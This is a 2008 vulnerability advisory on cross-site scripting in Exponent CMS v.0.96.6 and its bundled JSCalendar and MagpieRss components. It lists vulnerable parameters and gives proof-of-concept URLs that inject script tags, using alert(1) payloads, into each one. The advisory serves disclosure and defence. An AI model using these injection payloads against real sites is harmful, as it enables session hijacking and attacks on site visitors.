Exponent CMS v.0.96.6 Cross-Site Scripting
Author: Gerendi Sandor Attila
Date: April 21, 2008
Package: Exponent CMS
Product homepage: http://www.exponentcms.org
Versions Affected: v.0.96.6 (Other versions may also be affected)
Severity: XSS
Input passed to "toolbar" and "plugins" parameters in "/external/editors/fcktoolbarconfig.js.php", "url" in "/modules/imagemanagermodule/picked.php" and "u" in "/modules/slideshowmodule/slideshow.js.php" is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when malicious data is viewed.
Example:
http://somehost/exponent-0.96.6/external/editors/fcktoolbarconfig.js.php?toolbar=<script>alert\(1)</script>&plugins=
http://somehost/exponent-0.96.6/external/editors/fcktoolbarconfig.js.php?toolbar=&plugins=<script>alert\(1)</script>
http://somehost/exponent-0.96.6/modules/imagemanagermodule/picked.php?url=";</script><script>alert(1)</script><script>a="
http://somehost/exponent-0.96.6/modules/slideshowmodule/slideshow.js.php?u=<script>alert\(1)</script>
Inherited from JSCalendar
Input passed to "lang" parameter in "test.php" is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when malicious data is viewed.
Example:
http://somehost/somepath/jscalendar/test.php?lang="></script><script>alert(1)</script><"
Solution:
Delete the test file.
Inherited from MagpieRss
Input passed to "url" parameter in "magpie_debug.php" and "magpie_simple.php" and "rss_url" parameter in "magpie_slashbox.php" is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when malicious data is viewed.
Example:
http://somehost/magpierss-0.72/scripts/magpie_debug.php?url=<script>alert\(1)</script>
http://somehost/magpierss-0.72/scripts/magpie_simple.php?url=<script>alert\(1)</script>
http://somehost/magpierss-0.72/scripts/magpie_slashbox.php?rss_url=<script>alert\(1)</script>
Status:
1. Contacted the author at April 21, 2008 via sourceforge tracker.